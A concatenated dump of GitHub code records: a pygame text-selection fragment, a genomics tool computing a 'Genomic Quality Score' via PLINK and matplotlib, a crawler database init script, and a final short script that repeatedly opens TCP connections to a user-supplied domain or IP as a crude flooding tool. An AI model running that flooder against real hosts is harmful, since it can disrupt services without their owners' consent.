text.metrics(\"你\")\ntext_matrics1 = text.metrics(\"吗\")\nprint(text.size(\"你\"))\nprint(text_fmt.get_width())\nprint(text_fmt.get_size())\n\n# draw on the surface object\nDISPLAYSURF.fill(BLUE)\nDISPLAYSURF.blit(text_fmt,(100,100))\npygame.display.set_caption('Hello Pygame World!')\n\n'''\n\n'''\ndef getTextByPositon(text, font, beginPos):\n\n wordWidths = []\n for word in text:\n wordWidths.append(font.size(word)[0])\n\n wordHeight = font.size(word)[1]\n mouseX, mouseY = pygame.mouse.get_pos()\n if beginPos[1] < mouseY and beginPos[1] + wordHeight > mouseY:\n totalLength = 0\n for i in range(len(wordWidths)):\n totalLength += wordWidths[i]\n if totalLength + beginPos[0] > mouseX:\n return text[i]\n return \"\"\n\n\ndef getTextListByArea(text, font, textPos, 
beginPos, endPos):\n\n wordWidths = []\n for word in text:\n wordWidths.append(font.size(word)[0])\n wordHeight = font.size(word)[1]\n\n beginIndex = -1\n endIndex = -1\n beginSelPos = 0\n endSelPos = 0\n if (textPos[1] < beginPos[1] and textPos[1] + wordHeight > beginPos[1]) \\\n and (textPos[1] < endPos[1] and textPos[1] + wordHeight > endPos[1]):\n totalLength = 0\n for i in range(len(wordWidths)):\n totalLength += wordWidths[i]\n if totalLength + textPos[0] > beginPos[0] and beginIndex == -1:\n beginIndex = i\n beginSelPos = totalLength - wordWidths[i]\n if totalLength + textPos[0] > endPos[0] and endIndex == -1:\n endIndex = i + 1\n endSelPos = totalLength + textPos[0]\n\n if endIndex >= len(text):\n endIndex = len(text)\n\n if beginIndex > -1 and endIndex > -1:\n return text[beginIndex:endIndex], beginSelPos, endSelPos\n return '',0,0\n\n\ndef getSelectTextPos(text, font, beginPos):\n pass\n\n\nbeginPos = ()\nendPos = ()\nwhile True: # main game loop\n\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYDOWN:\n if event.key == K_LEFT:\n text_new = text.render(\"程已结束,退\",1,RED)\n DISPLAYSURF.blit(text_new,(125,100))\n if event.key == K_RIGHT:\n text_new = text.render(\"程已结束,退\",1,BLACK)\n DISPLAYSURF.blit(text_new,(125,100))\n elif event.type == MOUSEBUTTONDOWN:\n beginPos = pygame.mouse.get_pos()\n elif event.type == MOUSEBUTTONUP:\n endPos = pygame.mouse.get_pos()\n #selectText = getTextByPositon(\"进程已结束,退出代码\",text,(100,100))\n #print(selectText)\n if len(beginPos) > 0 and len(endPos) > 0:\n selText, beginPos, endPos = getTextListByArea(\"进程已结束,退出代码\",\n text,(100,100),beginPos,endPos)\n if len(selText) > 0:\n print(selText)\n text_new = text.render(selText, 1, RED)\n DISPLAYSURF.blit(text_new, (beginPos + 100, 100))\n beginPos = ()\n endPos = ()\n\n\n\n\n\n\n # 获得鼠标位置\n x, y = pygame.mouse.get_pos()\n\n\n\n pygame.display.update()","repo_name":"haizhiship/myMathProject","sub_path":"src/try/fontTry.py","file_name":"fontTry.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41203767036","text":"#!/usr/bin/env python\n\"\"\"\nThe Scripts is used to calculate GQS for single locus or given multiple locus.\n\"\"\"\n## import libraries\nimport argparse\nimport sys\nimport pandas as pd\nimport numpy as np\nimport os\nimport re\nimport subprocess\nparser=argparse.ArgumentParser()\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\nfrom contextlib import suppress\nimport datetime\n\n## fixed parameters\nq1=0.68;q2=0.95;q3=0.99\nnth=5\ncrit_cord=[(0.4,1),(1, 0.4)]\n##\n\nTODAY_YMD = datetime.datetime.today().strftime(\"Date: %Y-%m-%d \\nTime: %H:%M:%S\\n\")\n__version__ = '1.0.1'\nDEFHEAD = \"************************************************\\n\"\nDEFHEAD += \"* Genomic Quality Score (GQS)\\n\"\nDEFHEAD += \"* Version {V}\\n\".format(V=__version__)\nDEFHEAD += \"* Created by Swapnil Awasthi\\n\"\nDEFHEAD += \"***********************************************\\n\"\nDEFHEAD += TODAY_YMD\nDEFHEAD += \"***********************************************\\n\"\n\nparser=argparse.ArgumentParser(description=__doc__)\nparser.add_argument('--ifile', default=None, type=str, help=\"Input filename (single/sumstats)\")\nparser.add_argument('--regs', default=None, type=str, help=\"Defined regions (with these columns in this order CHR,START and END)\")\nparser.add_argument('--r2_th', default=0.0, type=float,help=\"SNPs below this LD will be 
excluded from the analysis (Default:0.0)\")\nparser.add_argument('--chrm', default=None, type=str, help=\"Chromosome number\")\nparser.add_argument('--chrm_h',default=None, type=str, help=\"Column name for the chromosome in the input file\")\nparser.add_argument('--pval_h',default=None, type=str, help=\"Column name for the Pvalue in the input file\")\nparser.add_argument('--snp_h', default=None, type=str, help=\"Column name for the SNP identifier in the input file\")\nparser.add_argument('--pos_h', default=None, type=str, help=\"Column name for the SNP position in the input file\")\nparser.add_argument('--ld_h', default=None, type=str, help=\"Column name for the LD in the input file\")\nparser.add_argument('--refG', default=None, type=str, choices=['genome1000-EUR','genome1000-EAS','HRC-EUR','HRC-EAS'], help='Reference Panel')\nparser.add_argument('--addout',default=None, type=str, help='prefix for the output files')\n\ndef sort_args(opts):\n    \"\"\" Maps the column names\"\"\"\n    cols_opts = [\n        [opts['chrm_h'], 'CHR'],\n        [opts['snp_h'], 'SNP'],\n        [opts['pval_h'],'PVAL'],\n        [opts['ld_h'], 'RSQR'],\n        [opts['pos_h'], 'POS'],\n    ]\n    col_dict = {x[0]: x[1] for x in cols_opts if x[0] is not None}\n    col_list=list(col_dict.keys())\n    return [col_dict, col_list]\n\ndef read_ifile(ifile,col_list, col_dict):\n    \"\"\"Try to read the file correctly\"\"\"\n    try:\n        data = pd.read_csv(ifile, delim_whitespace=True, usecols=col_list)\n        data=data.rename(columns=col_dict)\n        return (data)\n    except ValueError:\n        raise ValueError('One of these columns did not match the header\\n'+'\\n'.join(col_list))\n\ndef verify_chr(data,chrm):\n    \"\"\"Interpret the chromosome number from the file or verify the entered one\"\"\"\n    chr_list=['1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20','21','22']\n    if chrm is not None:\n        if chrm in chr_list:\n            chrm=chrm\n        else:\n            raise ValueError('Not a valid chromosome number')\n\n    else:\n        nchrm=data.CHR.value_counts().rename_axis('unique_values').reset_index(name='counts')\n        if nchrm.shape[0]>1:\n            raise ValueError('Column contains more than one possible chromosome?')\n\n        else:\n            chrm=str(nchrm['unique_values'].values[0])\n            if chrm in chr_list:\n                chrm=chrm\n            else:\n                raise ValueError('Not a valid chromosome number')\n    return chrm\n\nclass Logger(object):\n    \"\"\"Generate log files\"\"\"\n    def __init__(self, fh):\n        self.log_fh = open(fh, 'a')\n    def log(self, msg):\n        self.log_fh.write(msg)\n\ndef ld_filter(data,r2_th):\n    \"\"\"Filter on the LD threshold and return the included and excluded data\"\"\"\n    P1_index = data[data['RSQR'] > r2_th].index\n    P2_index = data[data['RSQR'] <=r2_th].index\n    data_inc = data.loc[P1_index]\n    data_exc = data.loc[P2_index]\n    data_exc.to_csv(addout+'_exc.r2th.txt', index=None, sep='\\t')\n    data_inc.to_csv(addout+'_for.plot.txt', index=None, sep='\\t')\n    return data_inc, data_exc\n\ndef get_index(bol, data):\n    \"\"\"Try to find index SNP\"\"\"\n    if bol is None:\n        index=data.nsmallest(1,'PVAL', keep='first')\n        return [index.SNP.values[0], index.PVAL.values[0]]\n    else:\n        index=data[data['RSQR']==1]\n        index=index.nsmallest(1,'PVAL', keep='first')\n        return [index.SNP.values[0], index.PVAL.values[0],index.PVAL_L.values[0]]\n\ndef calc_slope(cord):\n    \"\"\"Calculates slope of line\"\"\"\n    x1=cord[0][0]; y1=cord[0][1]; x2=cord[1][0]; y2=cord[1][1]\n    m=(y2-y1)/(x2-x1); i=y1-(m*x1)\n    return [m,i]\n\ndef shortest_dist(line,p):\n    \"\"\"Calculates shortest distance between two points on 2D space\"\"\"\n    m1=line[0]; i1=line[1]; x2=p[0]; 
y2=p[1]\n m2=-1/line[0]; i2=y2-(m2*x2)\n x_meet=(i2-i1)/(m1-m2); y_meet=m2*x_meet+i2\n dist=np.round(np.sqrt((x_meet-x2)**2+(y_meet-y2)**2),3)\n return dist\n\ndef color_code(index_snp, data):\n \"\"\"Assigns color for the scatter plot\"\"\"\n # different quantile of absolute residuals\n P68 = data['2*RESID'].quantile(q1); P95 = data['2*RESID'].quantile(q2); P99 = data['2*RESID'].quantile(q3)\n # Colours codes 68%,95%,99%\n data['Colors'] = np.where(data['2*RESID'] >= P68, 'red', 'black')\n data.loc[(data['2*RESID'] >= P68) & (data['2*RESID'] < P95), 'Colors'] = 'green'\n data.loc[(data['2*RESID'] >= P95) & (data['2*RESID'] < P99), 'Colors'] = 'orange'\n data.loc[data['SNP'] == index_snp[0], 'Colors'] = 'magenta' # index snp\n # directions\n data['SIGN'] = np.where(data.RESID > 0, '+', '-')\n data.loc[data.RESID == 0, 'SIGN'] = '0'\n ##areas\n data = data.sort_values(['PVAL_L_PRED'])\n data['Up68'] = np.round(data['PVAL_L_PRED'] + P68, 3); data['Lo68'] = np.round(data['PVAL_L_PRED'] - P68, 3)\n data['Up95'] = np.round(data['PVAL_L_PRED'] + P95, 3); data['Lo95'] = np.round(data['PVAL_L_PRED'] - P95, 3)\n data['Up99'] = np.round(data['PVAL_L_PRED'] + P99, 3); data['Lo99'] = np.round(data['PVAL_L_PRED'] - P99, 3)\n return data\n\ndef prep_gqs(data):\n \"\"\"Estimates necessary parameters for calculating GQS\"\"\"\n data['PVAL_L'] = np.round(-np.log10(data['PVAL']), 3) # negative log of p-values\n index_snp=get_index(True, data) # index snp\n b_cord=[(0, 0), (1, index_snp[2])] # line of the orgin and index snp\n b_m, b_i = calc_slope(b_cord)\n\n data['PVAL_L_PRED'] = np.round(data['RSQR']*b_m + b_i, 3) # expected 'PVAL_L' according to the above line\n data['RESID'] = np.round(data['PVAL_L'] - data['PVAL_L_PRED'], 3) # residuals\n data['2*RESID'] = np.round(np.sqrt(data['RESID']*data['RESID']), 3) # absolute values of residuals\n data=color_code(index_snp, data)\n\n # residuals/predicted p-value (i.e amount of signal lost or gain)\n data['M_RESID'] = np.round(data['RESID'] / data['PVAL_L_PRED'], 3)\n\n return index_snp, data\n\ndef data_sep(ndata):\n \"\"\"Some necessary modification for the plots\"\"\"\n ndata_pos = ndata[(ndata.SIGN == '+')].shape[0]\n ndata_neg = ndata[(ndata.SIGN == '-')].shape[0] + ndata[(ndata.SIGN == '0')].shape[0]\n\n ndata68_pos = ndata[(ndata.SIGN == '+') & (ndata.Colors == 'black')].shape[0]\n ndata68_neg = ndata[(ndata.SIGN == '-') & (ndata.Colors == 'black')].shape[0] + ndata[(ndata.SIGN == '0')].shape[0]\n\n ndata95_pos = ndata[(ndata.SIGN == '+') & (ndata.Colors == 'green')].shape[0]\n ndata95_neg = ndata[(ndata.SIGN == '-') & (ndata.Colors == 'green')].shape[0]\n\n ndata99_pos = ndata[(ndata.SIGN == '+') & (ndata.Colors == 'orange')].shape[0]\n ndata99_neg = ndata[(ndata.SIGN == '-') & (ndata.Colors == 'orange')].shape[0]\n\n ndata10_pos = ndata[(ndata.SIGN == '+') & (ndata.Colors == 'red')].shape[0]\n ndata10_neg = ndata[(ndata.SIGN == '-') & (ndata.Colors == 'red')].shape[0]\n\n return ({'ndata_pos':ndata_pos,'ndata_neg':ndata_neg,'ndata68_pos':ndata68_pos,'ndata68_neg':ndata68_neg,\\\n 'ndata95_pos':ndata95_pos,'ndata95_neg':ndata95_neg,'ndata99_pos':ndata99_pos,\\\n 'ndata99_neg':ndata99_neg,'ndata10_pos':ndata10_pos, 'ndata10_neg':ndata10_neg})\n\ndef plot_ldvsPval(ndata):\n \"\"\"Function to plot Scatter plot\"\"\"\n index = get_index(True, ndata)\n f, ax1 = plt.subplots(figsize=(10, 8))\n ax1.scatter(ndata['RSQR'],ndata['PVAL_L'], s=25, color=ndata['Colors'], label=None)\n ax1.scatter(1,index[2],s=40,marker='d',color='magenta',label=None)\n 
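# reference line from the origin to the index SNP at (r^2 = 1, -log10 p of the index); residuals are measured against this line\n    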
ax1.plot([1,0],[index[2],0],color='black')\n\n ##filling and colored line\n #green\n ax1.fill_between(ndata.RSQR, ndata.Lo68, ndata.Up68, color='#888888', alpha=0.30)\n lly68 = ndata.nsmallest(1, 'Lo68')['Lo68'].values; luy68 = ndata.nlargest(1, 'Lo68')['Lo68'].values\n llx68 = ndata.nsmallest(1, 'Lo68')['RSQR'].values; lux68 = ndata.nlargest(1, 'Lo68')['RSQR'].values\n ax1.plot([lux68, llx68], [luy68, lly68], color='green', linewidth=1)\n uly68 = ndata.nsmallest(1, 'Up68')['Up68'].values; uuy68 = ndata.nlargest(1, 'Up68')['Up68'].values\n ulx68 = ndata.nsmallest(1, 'Up68')['RSQR'].values; uux68 = ndata.nlargest(1, 'Up68')['RSQR'].values\n ax1.plot([uux68, ulx68], [uuy68, uly68], color='green', linewidth=1)\n #orange\n ax1.fill_between(ndata.RSQR, ndata.Lo95, ndata.Up95, color='#888888', alpha=0.20)\n lly95 = ndata.nsmallest(1, 'Lo95')['Lo95'].values; luy95 = ndata.nlargest(1, 'Lo95')['Lo95'].values\n llx95 = ndata.nsmallest(1, 'Lo95')['RSQR'].values; lux95 = ndata.nlargest(1, 'Lo95')['RSQR'].values\n ax1.plot([lux95, llx95], [luy95, lly95], color='orange', linewidth=1)\n uly95 = ndata.nsmallest(1, 'Up95')['Up95'].values; uuy95 = ndata.nlargest(1, 'Up95')['Up95'].values\n ulx95 = ndata.nsmallest(1, 'Up95')['RSQR'].values; uux95 = ndata.nlargest(1, 'Up95')['RSQR'].values\n ax1.plot([uux95, ulx95], [uuy95, uly95], color='orange', linewidth=1)\n #red\n ax1.fill_between(ndata.RSQR, ndata.Lo99, ndata.Up99, color='#888888', alpha=0.10)\n lly99 = ndata.nsmallest(1, 'Lo99')['Lo99'].values; luy99 = ndata.nlargest(1, 'Lo99')['Lo99'].values\n llx99 = ndata.nsmallest(1, 'Lo99')['RSQR'].values; lux99 = ndata.nlargest(1, 'Lo99')['RSQR'].values\n ax1.plot([lux99, llx99], [luy99, lly99], color='red', linewidth=1)\n uly99 = ndata.nsmallest(1, 'Up99')['Up99'].values; uuy99 = ndata.nlargest(1, 'Up99')['Up99'].values\n ulx99 = ndata.nsmallest(1, 'Up99')['RSQR'].values; uux99 = ndata.nlargest(1, 'Up99')['RSQR'].values\n ax1.plot([uux99, ulx99], [uuy99, uly99], color='red', linewidth=1)\n sep=data_sep(ndata)\n\n columns = ('Interval', '-SNP', '+SNP')\n cell_text = [['0', str(sep['ndata_neg']), str(sep['ndata_pos'])], ['0-68', str(sep['ndata68_neg']), str(sep['ndata68_pos'])],\n ['68-95', str(sep['ndata95_neg']), str(sep['ndata95_pos'])], ['95-99', str(sep['ndata99_neg']), str(sep['ndata99_pos'])],\n ['99-100',str(sep['ndata10_neg']), str(sep['ndata10_pos'])]]\n\n the_table2 = plt.table(cellText=cell_text, colLabels=columns, loc='upper left', cellLoc='center',\n colWidths=[0.07, 0.057, 0.060], \\\n colColours=['whitesmoke'] * 3,\n cellColours=[['whitesmoke'] * 3, ['grey'] * 3, ['green'] * 3, ['orange'] * 3, ['red'] * 3])\n\n the_table2.auto_set_font_size(False)\n the_table2.set_fontsize(11)\n the_table2.scale(1.2, 1.2)\n plt.suptitle('Index SNP: ' + index[0], fontsize=20)\n plt.suptitle('Index SNP: ' + index[0], fontsize=20)\n plt.title('r2 > '+str(args.r2_th), fontsize=18)\n\n plt.ylim(0, index[2] + 1)\n plt.xlim(0, 1.01)\n\n plt.xlabel(\"r^2\", fontsize=14)\n plt.ylabel(\"Observed (-logP)\", fontsize=14)\n plt.savefig(addout+'_R2vsPl.plot.pdf', dpi=400)\n plt.savefig(addout+'_R2vsPl.plot.png', dpi=400)\n\ndef plot_hist(ndata):\n \"\"\"Function to plot histogram\"\"\"\n n = ndata.shape[0]\n f, ax2 = plt.subplots(figsize=(10, 8))\n P68 = ndata['2*RESID'].quantile(0.68); P95 = ndata['2*RESID'].quantile(0.95)\n P99 = ndata['2*RESID'].quantile(0.99)\n index = get_index(True, ndata)\n ax2.hist(ndata['RESID'], bins=150, color='grey')\n ax2.axvline(x=0, color='black'); ax2.axvline(x=P68, color='green')\n 
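# vertical guides at the 68%/95%/99% quantiles of the absolute residuals, mirrored on both sides of zero\n    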
ax2.axvline(x=-P68, color='green'); ax2.axvline(x=P95, color='orange')\n    ax2.axvline(x=-P95, color='orange');ax2.axvline(x=P99, color='red')\n    ax2.axvline(x=-P99, color='red')\n    sep=data_sep(ndata)\n    L1_per_pos = str(np.round((sep['ndata_pos'] / n) * 100, 1))\n    L1_per_neg = str(np.round((sep['ndata_neg'] / n) * 100, 1))\n    L168_per_pos = str(np.round((sep['ndata68_pos'] / n) * 100, 1))\n    L168_per_neg = str(np.round((sep['ndata68_neg'] / n) * 100, 1))\n    L195_per_pos = str(np.round((sep['ndata95_pos'] / n) * 100, 1))\n    L195_per_neg = str(np.round((sep['ndata95_neg'] / n) * 100, 1))\n    L199_per_pos = str(np.round((sep['ndata99_pos'] / n) * 100, 1))\n    L199_per_neg = str(np.round((sep['ndata99_neg'] / n) * 100, 1))\n\n    L1100_per_pos = str(np.round((sep['ndata10_pos'] / n) * 100, 1))\n    L1100_per_neg = str(np.round((sep['ndata10_neg'] / n) * 100, 1))\n\n    columns = ('Interval', '-SNP (%)', '+SNP (%)')\n\n    cell_text = [['0', L1_per_neg, L1_per_pos], ['0-68', L168_per_neg, L168_per_pos],\n                 ['68-95', L195_per_neg, L195_per_pos], \\\n                 ['95-99', L199_per_neg, L199_per_pos], ['99-100', L1100_per_neg, L1100_per_pos]]\n\n    the_table2 = plt.table(cellText=cell_text, colLabels=columns, loc='upper left', cellLoc='center',\n                           colWidths=[0.075, 0.09, 0.09], \\\n                           colColours=['whitesmoke'] * 3,\n                           cellColours=[['whitesmoke'] * 3, ['grey'] * 3, ['green'] * 3, ['orange'] * 3, ['red'] * 3])\n\n    the_table2.auto_set_font_size(False)\n    the_table2.set_fontsize(12)\n    the_table2.scale(1.2, 1.2)\n    plt.suptitle('Index SNP: ' + index[0], fontsize=20)\n    plt.xlabel(\"RESID\", fontsize=14)\n    plt.ylabel(\"Number of SNPs\", fontsize=14)\n    plt.savefig(addout+'_Mresid.hist.pdf', dpi=400)\n    plt.savefig(addout+'_Mresid.hist.png', dpi=400)\n\ndef mod_gqs(data):\n    \"\"\"Modification for the GQS plot\"\"\"\n    data_index = data[data.M_RESID <= 0.0].index\n    ndata = data.loc[data_index]\n    # This is the critical line\n    c1_m,c1_i =calc_slope(crit_cord)\n    line = (c1_m, c1_i)\n    pw = (1.0, 1.0) # coordinates for the worst case\n    dist = shortest_dist(line, pw)\n    ndata['dist_critical'] = ndata.apply(lambda row: shortest_dist(line, (row['RSQR'], -row['M_RESID'])), axis=1)\n    ndata['gGQS'] = np.round((dist - ndata['dist_critical']) / dist, 3)\n\n    ndata['M_RESID_pred'] = np.round((c1_m * ndata['RSQR'] + c1_i), 3)\n    ndata['Rdist'] = np.round(abs(ndata['M_RESID']) - ndata['M_RESID_pred'], 3)\n    ndata['Colors2'] = np.where(ndata['Rdist'] > 0.0, 'red', 'black')\n    ndata.loc[(ndata['Rdist'] == 0.00), 'Colors2'] = 'yellow'\n\n    return ndata\n\n\ndef plot_gqs(data):\n    \"Function to plot GQS\"\n    ndata=mod_gqs(data)\n    f, ax2 = plt.subplots(figsize=(10, 8))\n    ax2.scatter(ndata['RSQR'], -ndata['M_RESID'], s=30, edgecolor='black', color=ndata['Colors2'])\n    plt.grid(True)\n\n    nrdata_index = ndata[ndata.Colors2 == \"red\"].index\n    nrdata = ndata.loc[nrdata_index]\n\n    if ndata[ndata.RSQR>0.40].shape[0]<=1:\n        gqs = -1\n    elif nrdata.shape[0] == 0:\n        gqs = 1\n    else:\n\n        gqs = nrdata.gGQS.min()\n        gqs_index = nrdata[nrdata.gGQS == gqs].index\n        gqs_df= nrdata.loc[gqs_index]\n        lgqs = gqs_df.SNP.values[0]\n\n        c2_i = np.abs(gqs_df['M_RESID'].values[0]) - 1 * gqs_df['RSQR'].values[0]\n        x_corr = (c2_i - 1.4) /-2\n        y_corr = -1.0 * x_corr + 1.4\n        ax2.plot([gqs_df['RSQR'].values[0], x_corr], [np.abs(gqs_df['M_RESID'].values[0]), y_corr], linestyle='--',\n                 color='coral')\n        ax2.text(gqs_df['RSQR'].values[0], np.abs(gqs_df['M_RESID'].values[0]), lgqs)\n        gqs = np.round(gqs, 3)\n    ax2.plot([0.4, 1], [1, 0.4], linestyle='-', color='black')\n    ax2.plot([1, 0.7], [1, 0.7], linestyle='--', 
color='black')\n\n    plt.ylim(0, 1.01)\n    plt.xlim(0, 1.01)\n    plt.text(.90, .95, str(nrdata.shape[0]), fontsize=20, color='b')\n\n    if (gqs == -1):\n        plt.text(.40, 1.1, 'GQS: ' + str(gqs), fontsize=20, color='black', bbox=dict(boxstyle=\"round\", fc='red'))\n    elif(gqs == 1):\n        plt.text(.40, 1.1, 'GQS: ' + str(gqs), fontsize=20, color='black', bbox=dict(boxstyle=\"round\", fc='green'))\n    else:\n        plt.text(.40, 1.1, 'GQS: ' + str(gqs), fontsize=20, color='black', bbox=dict(boxstyle=\"round\", fc='red'))\n\n    plt.title('r^2 > '+str(args.r2_th), fontsize=18)\n    plt.xlabel(\"r^2\", fontsize=14)\n    plt.ylabel(\"signal lost\", fontsize=14)\n\n    data.to_csv(addout+'_full.plot.txt',index=None, sep='\\t')\n    ndata.to_csv(addout + '_gqs.plot.txt', index=None, sep='\\t')\n    plt.savefig(addout+'_GqsVis.plot.pdf', dpi=400)\n    plt.savefig(addout+'_GqsVis.plot.png', dpi=400)\n    return [str(gqs),str(nrdata.shape[0])]\n\ndef cal_ld(ref_path, plink_path, chrm, data):\n    \"\"\"Calculate LD for each SNP w.r.t. the index SNP using PLINK: Might need some work; currently looks for the pattern 'chr1'\"\"\"\n    content=os.listdir(ref_path)\n    r1 = re.compile(\".*chr\"+chrm+\"[.|_].*fam\") ##search pattern--> chr1#\n    fam_file = list(filter(r1.match, content))\n    pref='.'.join(fam_file[0].split('.')[:-1])\n    index=get_index(None, data)\n    cmd1=plink_path+'plink --bfile '+ref_path+pref+' --r2 --ld-snp '+index[0]+' --ld-window-kb 1000 --ld-window 99999 --ld-window-r2 0 --out '+addout\n    proc1=subprocess.Popen(cmd1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n    (out, err) = proc1.communicate()\n    if not err.decode(\"utf-8\").strip():\n        pass\n    else:\n        raise ValueError('Are you sure the chromosome number is correct for this region/file')\n\n    ld_info=pd.read_table(addout+'.ld', delim_whitespace=True)\n    data_merge=pd.merge(data,ld_info,left_on=['SNP'],right_on=['SNP_B'],how='left')\n    data_merge=data_merge[['SNP','PVAL','R2']]; data_merge.columns=['SNP','PVAL','RSQR']\n    data_excl=data_merge[data_merge['RSQR'].isnull()]\n    data_plot=data_merge[data_merge['RSQR'].notnull()]\n    data_excl.to_csv(addout+'_exc.mis.ref.txt', index=None, sep='\\t')\n    return data_plot, data_excl\n\ndef create_config(name):\n    \"\"\"Setup the configuration file: Might need some work on other systems\"\"\"\n    cwd = os.getcwd()\n    if not os.path.exists(cwd+'/'+name):\n        open(cwd+'/'+name,'w+')\n        #os.mknod(cwd+'/'+name)\n        plink_loc = input(\"Enter the location of plink tool: \")\n        genome1000EUR_loc = input(\"Enter the location of genome1000-EUR: \")\n        genome1000EAS_loc = input(\"Enter the location of genome1000-EAS: \")\n        HRCEUR_loc = input(\"Enter the location of HRC-EUR: \")\n        HRCEAS_loc = input(\"Enter the location of HRC-EAS: \")\n        lw1='plink_loc '+plink_loc+'\\ngenome1000-EUR_loc '+genome1000EUR_loc+'\\ngenome1000-EAS_loc '+\\\n            genome1000EAS_loc+'\\nHRC-EUR_loc '+HRCEUR_loc+'\\nHRC-EAS_loc '+HRCEAS_loc\n        fw1=open(name,'a');fw1.write(lw1);fw1.close()\n        sys.exit('Restart the script!')\n    else:\n        gqs_config={}\n        with open(name, 'r') as f:\n            for line in f:\n                line=line.strip().split(' ')\n                gqs_config[line[0]]=line[1]\n        f.close()\n        return gqs_config\n\ndef read_locus(data, chrm, start, end):\n    \"\"\"Separate the defined locus from the summary statistics\"\"\"\n    locus_data=data[(data['CHR']==int(chrm)) & (data['POS']>=int(start)) & (data['POS']<=int(end))]\n    if locus_data.shape[0]==0:\n        return None\n    else:\n        return locus_data\ndef run_steps(data):\n    \"\"\"Sub function that calls the plot functions\"\"\"\n    data_inc, data_exc2 = ld_filter(data, opts['r2_th'])\n    if data_inc.shape[0] < nth:\n        raise 
ValueError('The number of SNPs is very small after merging with the reference.\\nPlease '\n                         'match the SNP identifier with the reference')\n    index, ndata = prep_gqs(data_inc)\n    plot_ldvsPval(ndata)\n    plot_hist(ndata)\n    gqs = plot_gqs(ndata)\n    out_res1='File_Name\\tCHR\\tIndex_SNP\\tPvalue\\tGQS\\tOutliers\\n'\n    out_res2 = args.ifile + '\\t' + chrm + '\\t' + index[0] + '\\t' + str('{:.3e}'.format(index[1])) + '\\t' + gqs[\n        0] + '\\t' + gqs[1] + '\\n'\n    log_ob.log(out_res1)\n    log_ob.log(out_res2)\n    print(out_res1)\n    print(out_res2)\n\ndef run_LD(data,chrm):\n    stat = create_config('gqs_config')\n    data, data_exc1 = cal_ld(stat[args.refG + '_loc'] + '/', stat['plink_loc'] + '/', chrm, data)\n    if data.shape[0] < nth:\n        raise ValueError('The number of SNPs is very small after merging with the reference.\\nPlease '\n                         'match the SNP identifier with the reference')\n    return data, data_exc1\nif __name__ == '__main__':\n    args=parser.parse_args()\n    if args.ifile is None:\n        raise ValueError('The --ifile flag is required.')\n    elif args.snp_h is None or args.pval_h is None or args.addout is None:\n        raise ValueError('--snp_h, --pval_h and --addout flags are required.')\n    elif args.chrm_h is None and args.chrm is None:\n        raise ValueError('Either the --chrm_h or the --chrm flag is required.')\n    elif args.ld_h is None and args.refG is None:\n        raise ValueError('Either the --ld_h or the --refG flag is required.')\n    if args.regs is not None:\n        if args.pos_h is None:\n            raise ValueError('--pos_h position column required to run on full sumstats')\n\n\n    addout = args.addout\n    opts = vars(args)\n    [col_dict, col_list] = sort_args(opts)\n\n    if args.regs is None:\n        data = read_ifile(opts['ifile'], col_list, col_dict)\n        chrm = verify_chr(data, args.chrm)\n        if args.ld_h is None:\n            data, data_exc1=run_LD(data,chrm)\n        log_ob = Logger(addout + '.log')\n        log_ob.log(DEFHEAD)\n        run_steps(data)\n    else:\n        data = read_ifile(opts['ifile'], col_list, col_dict)\n        with open(args.regs, 'r') as f1:\n            addout_cont=addout; args.ifile_cont=args.ifile\n            for line1 in f1:\n                line1 = line1.strip().split()\n                chrm = line1[0]; start = line1[1]; end = line1[2]\n                addout = addout_cont + \"_\" + chrm + \"_\" + start + \"_\" + end\n                args.ifile=args.ifile_cont + \"_\" + chrm + \"_\" + start + \"_\" + end\n                locus_data=read_locus(data, chrm, start, end)\n\n                log_ob = Logger(addout + '.log')\n                log_ob.log(DEFHEAD)\n                if locus_data is None:\n                    out_res=\"No SNPs in that range\"\n                    log_ob.log(out_res)\n                    print(\"No SNPs in that range\")\n                else:\n                    locus_data, data_exc1 = run_LD(locus_data, chrm)\n                    run_steps(locus_data)\n\n\n","repo_name":"Xswapnil/GQS","sub_path":"GQSmain.py","file_name":"GQSmain.py","file_ext":"py","file_size_in_byte":22933,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32953009691","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDatabase initialization\n\"\"\"\nimport os\nimport sys\nfrom db import Base, eng\nfrom config import BASE_DIR\n\nif __name__ == '__main__':\n    if len(sys.argv) != 2:\n        print(\"run with 1 arg : db or file to choose the mode while initializing\")\n        exit(-1)\n    mode = sys.argv[1]\n    if mode == 'file':\n        data_dir = os.path.join(BASE_DIR, 'data')\n        if not os.path.exists(data_dir):\n            os.mkdir(data_dir)\n        print('file mode done!')\n    elif mode == 'db':\n        Base.metadata.drop_all(eng) # drop tables\n        Base.metadata.create_all(eng) # create tables\n        print(\"db mode done!\")\n    else:\n        print(\"wrong mode, run with arg db or 
file!\")","repo_name":"cgDeepLearn/BilibiliCrawler","sub_path":"initial.py","file_name":"initial.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"zh","doc_type":"code","stars":36,"dataset":"github-code","pt":"53"} +{"seq_id":"22413942083","text":"import socket\r\nprint('1.sending request via domain')\r\nprint('2.sending request via IP & port')\r\nprint('========================================')\r\nnum1 = int(input('please choose number 1 or 2 ====>> '))\r\nnum2 = int(input('please Enter the request count'))\r\nif num1 == 1:\r\n    url = input('so now Enter your favorite Url ====>> ')\r\n    ip = socket.gethostbyname(url)\r\n    UDP_PORT = 80\r\n\r\n\r\n    for i in range(1, num2+1):\r\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # tcp connection\r\n        s.connect((ip, UDP_PORT))\r\n        print(f'successfully sent the request {i}')\r\n\r\n    print('the process has successfully completed ')\r\n    s.close()\r\nif num1 == 2:\r\n    ip1 = input('Enter ip ====> ')\r\n    port1 = int(input('Enter port number ====>> '))\r\n\r\n\r\n    for j in range(1, num2 + 1):\r\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # tcp connection\r\n        s.connect((ip1, port1))\r\n        print(f'successfully sent the request {j}')\r\n\r\n    print('the process has successfully completed ')\r\n    